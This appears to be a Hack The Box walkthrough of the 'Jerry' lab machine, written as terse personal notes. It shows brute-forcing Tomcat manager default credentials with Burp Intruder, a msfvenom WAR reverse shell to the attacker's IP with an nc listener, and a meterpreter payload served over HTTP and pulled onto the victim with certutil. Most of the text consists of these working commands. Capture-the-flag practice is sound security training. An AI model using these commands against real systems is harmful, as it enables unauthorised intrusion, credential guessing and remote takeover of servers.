Jerry
HTB - 5. Jerry (Default Credentials)
nmap -T4 -p- -A 10.10.10.95
shows 8080 open with Apache Tomcat/Coyote JSP engine 1.1 and Tomcat version 7.0.88Go to
10.10.10.95
and shwos Apache Tomcat default pageSearch
tomcat default credentials
and found https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdownBurp Suite
Click server management page
Try login with
tomcat:tomcat
Send to decoder
Select authorization basic and decode as base64
Forwarded and did not work
Try again and sent to repeater and intruder
Create passwords
Get from the url and replace " " with ":".
Write bash script to base64 encode all the credentials
for cred in $(cat tomcat.txt); do echo -n $cred | base64; done
Back to Burp Suite Intruder
Set to sniper attack
Select the authorization basic
Paste in list of base64 encoded usernames and passwords into Payloads/Payload Options
Disable URL encoder
Run and see much longer length code 200 for the successful credientials:
tomcat:s3cret
Create WAR file exploit
Search
tomcat war reverse shell msfvenom
: https://netsec.ws/?p=331msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war > shell.war
which will try to connect to our computer on port 4444nc -nvlp 4444
to listen on port 4444Upload to tomcat managment server and deploy
Go to
/shell
and gotnt authoirty/system
whoami cd c:\users\administrator cd Desktop cd flags dir arp -a
New reverse shell Create payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=5555 -f exe > sh.exe
Listen on port 5555:
sudo msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set LHOST 10.10.14.24 set LPORT 5555 run
Transfer file to windows:
python -m SimpleHTTPServer 80 <-- start server on attacker certutil -urlcache -f http://10.10.14.24/sh.exe c:\users\administrator\desktop\flags\sh.exe <-- On victim dir sh.exe
Result: shell popped
Last updated
Was this helpful?